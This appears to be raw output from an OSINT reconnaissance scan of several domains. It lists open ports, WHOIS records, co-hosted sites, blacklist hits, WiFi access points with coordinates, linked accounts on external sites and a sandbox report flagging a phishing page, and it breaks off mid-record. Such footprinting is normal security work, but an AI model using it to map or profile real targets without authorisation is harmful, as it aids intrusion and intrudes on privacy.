| 2023-05-12 03:21:07 | Malicious IP on Same Subnet | Yes | Emerging Threats | 0 | 0 | 4 | 0 | None | emergingthreats.net [207.154.224.0/20]
https://rules.emergingthreats.net/blockrules/compromised-ips.txt | 207.154.224.0/20 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom71CC68 (Net ID: 00:0C:F6:71:CC:68) | 50.8897, 6.0563 |
| 2023-05-12 02:53:39 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 185.199.108.153 |
| 2023-05-12 03:00:16 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | mail.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:09:02 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.99 | 87.248.157.102 |
| 2023-05-12 02:54:23 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H04DT6EFGA302FBVMKFT2XD1"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 4 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6036feab195d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="xHEPK.9yJ4uMnlaQxqQ03K5Csvr7WqmdHv5Obe9KwF8-1683860053-0-AVLFWFwz5cW9coePC-vcYYHeZXoVyZvPTnO5FSb69_py4IiBnIT69jsbDrQcjp17Zdx1pnQSJS5VK5u2qIZwYpKNdgBE5WortG78wVuw6xpL5WYKY8Pci1GRr-7IBheF2wnVhBXoAAbVv_kvF_G81MlD02OBybPgpztHUD8TsNxjUjxn5wbC4eO6XMoHSPC4tPjeAbdNC_mEhVDvKltWOjEKs7cQGG73dOqgzgZ5u0yyPTVVyh672vGUJchUE-7DlMtIc30cGk9vDedhhqnCEm6pQHqEqKn7E1c0_xe56xpqCOyx0gVIxxZL8ZolJaAY4W4DtMmEP6W2tHpS_rYvBDI9fm43yWOoTbxEvpOBUd21ETXlvv9NENQqsCUvjbm4kjTEkCkt9i7ao6sYMKBDIKOrBrqKSvX_CT_w9eydgmcnRxeGAnGPZ1UUlMCuPuHg11UNYHIqPBTtKLbqJ0CVo0se3b48fGi-sK8cLCpgZLWb2fRokqIeBAyscADBAfixig610ec8NyTnlho4fWsEuVJ8IH0YuFSDI5qB-p_hHDFAgQ4e2o5glLWVxkylixix8LPq3AjtUqJZW7z32u6RcNlBfPCJCrP_P-wzAtCmBv9wwLgJM8s28Fc0U3NqhEI7UzCd5r2rd1L9dZdXgwaESjOHBhuzibRb747KWauMhNoTHcDBBW-Cplvyyky4fhJh4codwoIMSFuB2e8vqSriOeMyuMhff86CdrTUwmJ-MpOwS5b3SzLp4WsUmqgXo5R_Ptn_13EQTYvgg_fn9wQYMVvNul0EzUw-m0dzAaXiayW9ZQRIKrGrxHaH77vlgDYfon_mV1EHNo0mYKenjF4lATYUDXOdsHJGDEb-aoyHMedXT2xjfifF75YrCt7aKEBajKaabeBOm93QKGtGLkUbhjuxR1Cv3fMl-a8Mcq-sqIzDY7Ofms_NojFVCky1MxilEB-pECoh_3dTQi7RdzrUTwf2cZR9T8D8U2K3Gvk8riLAICiz8kZstCExyU1gQxK_8IKsvToQ9RDrd9y9LVAX9qYv3TfadD1EkNEsFVChUuXBIn1vLV2P2GOPSzKbMN6zXhMlaXjRniTwtw6d8mrDXwAGH5ieemrcUb3FjxXespiPiaHaem6NlgnFXh6fqC6miAGPTygfZ8E84F8EVSFKovIkpjZZLkzg9smKqoObMwmWAc8hXyTmDTP1LoHTnasWw3kR_c4rubMdm-bM_qzcdotudBYUrTeL52K6MUKh8U0LXxV1ssRlYQtn51j2ZPTCT_4njX0UJZi7Aqe8bZOIi6YaJ6JVsLLVQlGwMIkxweehKTweGkzepoKrlA3vvzsnIuw6hwdTbMC1ff1nqZDuEXn1iUtY0QVWk3AiHWDwvflyRUhJFVQ_1RWCY6QxNbtBWuOs4Gsp4MKA65Y2bcGJNUQ61JSZsl8YoM493x6bgQq2c1ARXqI8Z_BprKNhAkkBaHzNAZnBx2sKG-aiygeREJS_Y-EXoEZkRsbQX02jydwcJZ3mjFQKdYrYE5cpUbTynwFh1r8orCm-Lgkh_khmNL7q7VDaHkkpQxyvlai7E7fXqkM8fGYOO32gd0hDiIlm85y2e8PdcZwTHglcg5WuEl3dz67kdyLqQrK_w0NhcEVoQlt-w-zjK_ug7gJVFCqVZy6o3CJv3Lkws4Pg2ePLly9U4qZNVRt3zz5hcKoCs-Pa1ZZzJ_Qzb2gSMP3u4cNDexag1H59HlUfcR7rjMJpsPYzqNpSQW3aa4RjeYciW4G4IbxfKJhCeUuFM4E4frBI_2OUYka-3R16-e5B-3ARb0HzAH7oGbA0ldmTnvfk1irgRMe8Dly0jpz5UNRE52UktWtSquB5QC1854VbxxgX4hhaW-nxmTCdOLafGYF1vg8rF-8NC
1_FbTKMqIVsNKBWX0k0kJqiJjLCwjxEgXQ0Ze8manGpGGX8Y1qPfnNzHc2wFXLAoenNI_c9mp5k_TulxRQaJau67nLCYZqdFCfQ3OMpvtX4xDex5PrZ9T6mJUZ1nmSTAUixBLPwpRedqy1s01H2wlDBkSOhsj3ve3tA6H7ilQqtLQdfAuHK0_eW1Lnq3yDEyuzONZ1kc6hBMbhcyIePtyej1WeNa25rCw6imHPfgLzKSCX7sag3MiyXZyiVPtZsVrR333h3qptvAltAf6opML25pqpe_uKUHyc688RAlp_EgHCq-Gbx-iN5q2hY5Ny4xRPFJdCIjbFhNtGVw4MmWaJvAiePWPHqtweVVadLDMPlJCf3alqy71aqsxQI2WCWYRD_4Slgey6lOkSSsS-VG0B1_pBFsI7Qoqg4mLVGYQxVgLA66wEWyPhSdzuYryBNRXVwsWkB269be5JcqZIZNgC1b12-boaqHNSrCKMj83nOOm100RSF9-42ajHgNdPc9977LoOsIdA4wiwXyaum_ok5aRH8NPa5DUgCLteaEnABaI691YwS3Yv94Jp3MSd41yoh45wgGe42SPtQxw">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '8897',
cRay: '7c5f6036feab195d',
cHash: '461a186bf737deb',
cUPMDTk: "\/?__cf_chl_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA1My41OTUwMDA=',
m: '5/J7gGK8XmEBWkArTjJaJQpVmCj5kenNaxHbI91xZvc=',
i1: 'd1xtl4gFAsGt/e5zgSdIvg==',
i2: 'L38k4kp9xxsqGxDFehGWAg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6036feab195d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6036feab195d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Germany | Frankfurt am Main, Hesse, 60313, Germany, Europe |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:8080 | 87.248.157.102 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Netlify | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | iz-wpa (Net ID: 00:01:8E:1A:64:A6) | 37.780462,-122.390564 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:37:7A:79) | 39.0469, -77.4903 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | Domains By Proxy, LLC | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CCAZ (Net ID: 00:02:6F:EA:D0:4E) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Mmorpg (Category: gaming)
https://forums.mmorpg.com/profile/login | login |
| 2023-05-12 03:00:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.46): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | YOSEMITE (Net ID: 00:03:52:A1:3D:41) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:00 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | oldfluid.battleb0t.xyz |
| 2023-05-12 02:49:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis report dump omitted] | 185.199.110.153 |
| 2023-05-12 02:46:18 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Reverse proxy | skip.ns.cloudflare.com |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.86): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | trakt (Category: video)
https://trakt.tv/users/ayhu | ayhu |
| 2023-05-12 03:00:57 | Malicious Co-Hosted Site | Yes | VXVault.net | 0 | 1 | 2 | 0 | None | VXVault Malicious URL List [www.github.com]
http://vxvault.net/URL_List.php | www.github.com |
| 2023-05-12 02:49:43 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis report dump omitted] | 185.199.110.153 |
| 2023-05-12 02:44:23 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.github.com | 185.199.109.153 |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net | Domain Name: scoop.sh
Registry Domain ID: 688a2dc7e3804150a8a7bd65025fc26d-DONUTS
Registrar WHOIS Server: whois.gandi.net
Registrar URL: https://www.gandi.net
Updated Date: 2022-05-25T08:13:34Z
Creation Date: 2013-06-20T11:02:06Z
Registry Expiry Date: 2023-06-20T11:02:06Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: QLD
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: ns-1530.awsdns-63.org
Name Server: ns-604.awsdns-11.net
Name Server: ns-308.awsdns-38.com
Name Server: ns-1776.awsdns-30.co.uk
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain Name: scoop.sh
Registry Domain ID: UNDEF-ROID
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2023-04-21T08:07:40Z
Creation Date: 2013-06-20T09:02:06Z
Registrar Registration Expiration Date: 2023-06-20T11:02:06Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Name Server: NS-604.AWSDNS-11.NET
Name Server: NS-1776.AWSDNS-30.CO.UK
Name Server: NS-308.AWSDNS-38.COM
Name Server: NS-1530.AWSDNS-63.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL:
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 02:54:15 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | nwapi2.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | khome2 (Net ID: 00:00:94:CC:A7:CF) | 52.3759, 4.8975 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | GURTOPLAR (Net ID: 00:14:C1:27:91:4C) | 40.2024, 29.0398 |
| 2023-05-12 02:53:39 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.108.153:443 | 185.199.108.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | m31 (Net ID: 00:02:2D:21:9A:0A) | 37.7642, -122.3993 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.68 | 34.74.170.74 |
| 2023-05-12 03:23:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.4:8443 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 4ffa2f (Net ID: 00:02:2D:4F:FA:2F) | 37.7642, -122.3993 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00saadchaudhry.github.io | 185.199.111.153 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 3 | 0 | 2 | 0 | None | http://nuke.battleb0t.xyz/ | nuke.battleb0t.xyz |
| 2023-05-12 02:52:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://kill3r14.github.io/netflixClone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "IsoScope_f2c_IE_EarlyTabStart_0xd78_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n 